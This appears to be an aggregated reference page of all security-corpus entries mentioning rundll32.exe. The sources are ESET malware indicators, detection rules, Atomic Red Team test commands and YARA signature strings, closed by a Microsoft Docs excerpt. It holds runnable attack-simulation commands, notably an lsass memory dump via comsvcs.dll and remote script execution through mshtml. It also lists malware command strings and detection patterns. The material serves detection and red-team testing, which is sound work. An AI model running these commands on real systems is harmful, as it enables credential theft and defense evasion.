malware-ioc invisimole "FlashConfigEnrollee" = "shell32 ShellExec_RunDLL "C:\Windows\SysWOW64\drivers\Rundll32.exe" "C:\Windows\SysWOW64\drivers\wdigest.dll",SpInitialize %SHELLCODE_BYTES%" © ESET 2014-2018
malware-ioc win_apt_invisimole_sminit_chain.yml - 'rundll32.exe shell32.dll,ShellExec_RundDLL' © ESET 2014-2018
malware-ioc win_apt_invisimole_wdigest_chain.yml CommandLine|contains: 'rundll32.exe Shell32.dll ShellExec_RunDLL cmd.exe /c mkdir SMRTNTKY\MessageB.txt' © ESET 2014-2018
malware-ioc win_apt_invisimole_wdigest_chain.yml - '\Windows\SysWOW64\drivers\Rundll32.exe' © ESET 2014-2018
malware-ioc win_apt_invisimole_wrapper_dll.yml Image|endswith: '\rundll32.exe' © ESET 2014-2018
malware-ioc win_suspicious_rundll32.yml title: Suspicious Execution of Rundll32.exe © ESET 2014-2018
malware-ioc win_suspicious_rundll32.yml description: Detects instances when Rundll32.exe is executed outside of the system folder, or when Rundll32.exe is unsigned. InvisiMole Group uses a Windows XP version of Rundll32.exe to load and exploit a vulnerable Windows XP library. As Rundll32.exe is signed by a catalog file, older versions will not be signed on newer OS versions which can trigger this detection. © ESET 2014-2018
malware-ioc win_suspicious_rundll32.yml - Rundll32.exe intentionally copied outside of the system folder. © ESET 2014-2018
malware-ioc win_suspicious_rundll32.yml - Legitimate use of older version of Rundll32.exe on newer OS © ESET 2014-2018
malware-ioc win_suspicious_rundll32.yml Image|endswith: 'rundll32.exe' © ESET 2014-2018
malware-ioc win_suspicious_rundll32.yml - '\Windows\SysWOW64\rundll32.exe' © ESET 2014-2018
malware-ioc win_suspicious_rundll32.yml - '\Windows\system32\rundll32.exe' © ESET 2014-2018
malware-ioc win_suspicious_rundll32.yml - 'rundll32.exe' © ESET 2014-2018
malware-ioc rtm Windows Update = rundll32.exe "%PROGRAMDATA%\Winlogon\winlogon.lnk",DllGetClassObject host © ESET 2014-2018
malware-ioc rtm rundll32.exe © ESET 2014-2018
atomic-red-team index.md - Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - T1218.011 Rundll32 MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #2: Rundll32 execute VBscript command [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: Rundll32 advpack.dll Execution [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #4: Rundll32 ieadvpack.dll Execution [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #5: Rundll32 syssetup.dll Execution [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #6: Rundll32 setupapi.dll Execution [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #7: Execution of HTA and VBS Files using Rundll32 and URL.dll [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #8: Launches an executable using Rundll32 and pcwutl.dll [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #9: WMI Execute rundll32 [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1218.011 Rundll32 MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #2: Rundll32 execute VBscript command [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #3: Rundll32 advpack.dll Execution [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #4: Rundll32 ieadvpack.dll Execution [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #5: Rundll32 syssetup.dll Execution [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #6: Rundll32 setupapi.dll Execution [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #7: Execution of HTA and VBS Files using Rundll32 and URL.dll [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #8: Launches an executable using Rundll32 and pcwutl.dll [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #9: WMI Execute rundll32 [windows] MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | | | | Rundll32 | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | | | | | Rundll32 | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team T1003.md C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md <blockquote>Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename rundll32.exe). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1047.md - Atomic Test #9 - WMI Execute rundll32 MIT License. © 2018 Red Canary
atomic-red-team T1047.md Invoke-WMIMethod win32_process -name create -argumentlist 'rundll32 c:\windows\idmu\common\ypprop.dll _XInitImageFuncPtrs' -ComputerName WORKSTATION MIT License. © 2018 Red Canary
atomic-red-team T1047.md ## Atomic Test #9 - WMI Execute rundll32 MIT License. © 2018 Red Canary
atomic-red-team T1047.md This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for remote IP using the node parameter. MIT License. © 2018 Red Canary
atomic-red-team T1047.md wmic /node:#{node} process call create "rundll32.exe #{dll_to_execute} #{function_to_execute}" MIT License. © 2018 Red Canary
atomic-red-team T1134.004.md Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of PowerShell/Rundll32 to be explorer.exe rather than an Office document delivered as part of Spearphishing Attachment.(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via Visual Basic within a malicious Office document or any code that can perform Native API.(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018) MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md - Atomic Test #7 - Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md ## Atomic Test #7 - Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md Executes an HTA Application with JScript Engine, Rundll32 and Inline Protocol Handler. MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md | rundll32_file_path | Location of rundll32.exe | Path | $env:windir\system32\rundll32.exe| MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md # T1218.011 - Rundll32 MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md <blockquote>Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads. MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL) MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md - Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md - Atomic Test #2 - Rundll32 execute VBscript command MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md - Atomic Test #3 - Rundll32 advpack.dll Execution MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md - Atomic Test #4 - Rundll32 ieadvpack.dll Execution MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md - Atomic Test #5 - Rundll32 syssetup.dll Execution MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md - Atomic Test #6 - Rundll32 setupapi.dll Execution MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md - Atomic Test #7 - Execution of HTA and VBS Files using Rundll32 and URL.dll MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md - Atomic Test #8 - Launches an executable using Rundll32 and pcwutl.dll MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md ## Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec(); MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md ## Atomic Test #2 - Rundll32 execute VBscript command MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test. MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Technique documented by Hexacorn - http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/ MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md | command_to_execute | Command for rundll32.exe to execute | String | calc.exe| MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0) MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md ## Atomic Test #3 - Rundll32 advpack.dll Execution MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Test execution of a command using rundll32.exe with advpack.dll. MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md ## Atomic Test #4 - Rundll32 ieadvpack.dll Execution MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Test execution of a command using rundll32.exe with ieadvpack.dll. MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md ## Atomic Test #5 - Rundll32 syssetup.dll Execution MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Test execution of a command using rundll32.exe with syssetup.dll. Upon execution, a window saying "installation failed" will be opened MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .#{inf_to_execute} MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md ## Atomic Test #6 - Rundll32 setupapi.dll Execution MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Test execution of a command using rundll32.exe with setupapi.dll. Upon execution, a window saying "installation failed" will be opened MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .#{inf_to_execute} MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md ## Atomic Test #7 - Execution of HTA and VBS Files using Rundll32 and URL.dll MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32.exe url.dll,OpenURL %PUBLIC%\index.hta MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32.exe URL.dll,FileProtocolHandler C:\..\Detail\akteullen.vbs MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md In this atomic, the sample hta file opens the calculator and the vbs file shows a message dialog with "rundll32 spawned wscript" MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32.exe url.dll,OpenURL PathToAtomicsFolder\T1218.011\src\index.hta MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32.exe URL.dll,FileProtocolHandler PathToAtomicsFolder\T1218.011\src\akteullen.vbs MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md ## Atomic Test #8 - Launches an executable using Rundll32 and pcwutl.dll MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch} MIT License. © 2018 Red Canary
atomic-red-team T1548.002.md If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated Component Object Model objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of Rundll32 to load a specifically crafted DLL which loads an auto-elevated Component Object Model object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows) MIT License. © 2018 Red Canary
signature-base apt_apt29_nobelium_may21.yar $a1 = "rundll32.exe" wide CC BY-NC 4.0
signature-base apt_apt29_nobelium_may21.yar $s2 = "rundll32.exe %s %s" ascii fullword CC BY-NC 4.0
signature-base apt_apt29_nobelium_may21.yar $s1 = "rundll32.exe {0} {1}" wide fullword CC BY-NC 4.0
signature-base apt_apt41.yar $s1 = "Rundll32.exe \"%s\", DisPlay 64" fullword ascii CC BY-NC 4.0
signature-base apt_codoso.yar $s0 = "rundll32 \"%s\",%s" fullword ascii CC BY-NC 4.0
signature-base apt_codoso.yar $s1 = "rundll32.exe \"%s\", RunMeByDLL32" fullword ascii CC BY-NC 4.0
signature-base apt_codoso.yar $x2 = "rundll32.exe \"%s\", RunMeByDLL32" fullword ascii CC BY-NC 4.0
signature-base apt_derusbi.yar $x4 = "rundll32.exe \"%s\", R32 %s" fullword wide CC BY-NC 4.0
signature-base apt_emissary.yar $s3 = "rundll32.exe \"%s\",Setting" fullword ascii CC BY-NC 4.0
signature-base apt_freemilk.yar $s4 = "outFile=sysDir&\"\\rundll32.exe\"" fullword ascii CC BY-NC 4.0
signature-base apt_glassRAT.yar // $bin2 = {34 02} // xor al, 2 --> XOR key for rundll32.exe CC BY-NC 4.0
signature-base apt_glassRAT.yar $s1 = "pwlfnn10,gzg" // rundll32.exe XOR 02 CC BY-NC 4.0
signature-base apt_glassRAT.yar $s6 = "rundll32 \"%s\",AddNum" fullword ascii CC BY-NC 4.0
signature-base apt_golddragon.yar $x2 = "rundll32.exe %s RunningRat" fullword ascii CC BY-NC 4.0
signature-base apt_golddragon.yar $x4 = "rundll32.exe %s ExportFunction" fullword ascii CC BY-NC 4.0
signature-base apt_golddragon.yar $x5 = "rundll32.exe \"%s\" RunningRat" fullword ascii CC BY-NC 4.0
signature-base apt_golddragon.yar $s5 = "rundll32.exe \"%s\" Run" fullword ascii CC BY-NC 4.0
signature-base apt_keyboys.yar $s4 = "rundll32.exe %s Main" fullword ascii CC BY-NC 4.0
signature-base apt_keyboys.yar $x1 = "rundll32.exe %s SSSS & exit" fullword ascii CC BY-NC 4.0
signature-base apt_keyboys.yar $x1 = "%s\\rundll32.exe %s ServiceTake %s %s" fullword ascii CC BY-NC 4.0
signature-base apt_khrat.yar $x2 = "CreateObject(\"WScript.Shell\").Run \"rundll32.exe javascript:\"\"\\..\\mshtml,RunHTMLApplication" ascii CC BY-NC 4.0
signature-base apt_korplug_fast.yar $x1 = "%s\\rundll32.exe \"%s\", ShadowPlay" fullword ascii CC BY-NC 4.0
signature-base apt_korplug_fast.yar $s1 = "%s\\rundll32.exe \"%s\"," fullword ascii CC BY-NC 4.0
signature-base apt_op_cloudhopper.yar $s2 = "rundll32.exe \"%s\", UnInstall /update %s" fullword wide CC BY-NC 4.0
signature-base apt_rokrat.yar $x3 = "outFile=sysDir&\"\\rundll32.exe\"" fullword ascii CC BY-NC 4.0
signature-base apt_sakula.yar $str02 = "cmd.exe /c rundll32 \"%s\" Play \"%s\"" CC BY-NC 4.0
signature-base apt_sakula.yar $str08 = "cmd.exe /c rundll32 \"%s\" ActiveQvaw \"%s\"" CC BY-NC 4.0
signature-base apt_sofacy_oct17_camp.yar $s1 = "start rundll32.exe %path %,#1a" fullword ascii CC BY-NC 4.0
signature-base apt_tidepool.yar $s2 = "C:\\Windows\\System32\\rundll32.exe" fullword wide CC BY-NC 4.0
signature-base apt_wildneutron.yar $s0 = "rundll32.exe \"%s\",#1" fullword wide /* PEStudio Blacklist: strings */ /* score: '33.00' */ CC BY-NC 4.0
signature-base apt_wilted_tulip.yar $s1 = "%s\\system32\\rundll32.exe" fullword wide CC BY-NC 4.0
signature-base apt_wilted_tulip.yar $r1 = "C:\\Windows\\syswow64\\rundll32.exe</Command>" fullword wide CC BY-NC 4.0
signature-base apt_wilted_tulip.yar $s2 = "%s\\system32\\rundll32.exe" fullword wide CC BY-NC 4.0
signature-base apt_wilted_tulip.yar $s3 = "%s\\SysWOW64\\rundll32.exe" fullword wide CC BY-NC 4.0
signature-base apt_winnti.yar $a9 = "\\rundll32.exe" wide CC BY-NC 4.0
signature-base apt_winnti_burning_umbrella.yar $s2 = "rundll32.exe %s,Startup" fullword ascii CC BY-NC 4.0
signature-base cn_pentestset_webshells.yar $s3 = "$cmd=\"cmd /c rundll32.exe $path,install $openPort $activeStr\";" fullword ascii /* PEStudio Blacklist: strings */ CC BY-NC 4.0
signature-base crime_badrabbit.yar $s9 = "process call create \"C:\\Windows\\System32\\rundll32.exe" fullword wide CC BY-NC 4.0
signature-base crime_fireball.yar $s2 = "rundll32.exe \"%s\",%s" fullword wide CC BY-NC 4.0
signature-base crime_fireball.yar $s2 = "RunDll32.exe \"" fullword wide CC BY-NC 4.0
signature-base crime_kriskynote.yar $s1 = "rundll32 %s Check" fullword ascii CC BY-NC 4.0
signature-base crime_nopetya_jun17.yar $x2 = "process call create \"C:\\Windows\\System32\\rundll32.exe \\\"C:\\Windows\\%s\\\" #1 " fullword wide CC BY-NC 4.0
signature-base crime_nopetya_jun17.yar $x3 = "-d C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\%s\",#1 " fullword wide CC BY-NC 4.0
signature-base crime_nopetya_jun17.yar /* ,#1 ..... rundll32.exe */ CC BY-NC 4.0
signature-base generic_anomalies.yar description = "Detects uncommon file size of rundll32.exe" CC BY-NC 4.0
signature-base generic_anomalies.yar and filename == "rundll32.exe" CC BY-NC 4.0
signature-base gen_gen_cactustorch.yar $x6 = "Dim binary : binary = \"rundll32.exe\"" fullword ascii CC BY-NC 4.0
signature-base gen_gen_cactustorch.yar $s1 = "binary = \"rundll32.exe\"" fullword ascii CC BY-NC 4.0
signature-base gen_gen_cactustorch.yar $s4 = "var binary = \"rundll32.exe\";" fullword ascii CC BY-NC 4.0
signature-base gen_malware_set_qa.yar $s4 = "\\sysnative\\rundll32.exe" fullword ascii CC BY-NC 4.0
signature-base gen_powershdll.yar $x1 = "rundll32 PowerShdll,main -f " fullword wide CC BY-NC 4.0
signature-base gen_powershdll.yar $x3 = "rundll32 PowerShdll,main CC BY-NC 4.0
signature-base gen_rats_malwareconfig.yar $s7 = "cmd.exe /c rundll32 \"%s\"" CC BY-NC 4.0
signature-base gen_url_persitence.yar $file1 = /\x0a\x0d\s=[^\x0d](powershell|cmd|certutil|mshta|wscript|cscript|rundll32|wmic|regsvr32|msbuild)(.exe|)[^\x0d]{2,50}\x0d/ nocase CC BY-NC 4.0
signature-base yara_mixed_ext_vars.yar description = "Tool used in Operation Cloud Hopper - pscp.exe cloaked as rundll32.exe" CC BY-NC 4.0
signature-base yara_mixed_ext_vars.yar all of them and filename == "rundll32.exe" CC BY-NC 4.0

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.


rundll32

Loads and runs 32-bit dynamic-link libraries (DLLs). There are no configurable settings for Rundll32. Help information is provided for a specific DLL you run with the rundll32 command.

You must run the rundll32 command from an elevated command prompt. To open an elevated command prompt, click Start, right-click Command Prompt, and then click Run as administrator.

Syntax

rundll32 <DLLname>

Parameters

Parameter Description
Rundll32 printui.dll,PrintUIEntry Displays the printer user interface.

Remarks

Rundll32 can only call functions from a DLL explicitly written to be called by Rundll32.

Additional References


MIT License. Copyright (c) 2020-2021 Strontic.